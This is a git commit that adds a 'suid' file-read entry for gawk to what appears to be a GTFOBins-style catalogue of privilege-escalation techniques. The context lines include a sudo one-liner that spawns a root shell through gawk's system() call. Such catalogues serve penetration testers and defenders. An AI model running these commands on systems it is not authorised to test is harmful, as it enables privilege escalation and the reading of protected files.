Add SUID category to gawk as file read

This commit is contained in:
Nick Blekherman
2021-01-18 09:46:51 +02:00
committed by GitHub
parent 085e72a971
commit 31b69cfeed

View File

@@ -27,6 +27,10 @@ functions:
- code: |
LFILE=file_to_read
gawk '//' "$LFILE"
suid:
- code: |
LFILE=file_to_read
./gawk '//' "$LFILE"
sudo:
- code: sudo gawk 'BEGIN {system("/bin/sh")}'
limited-suid: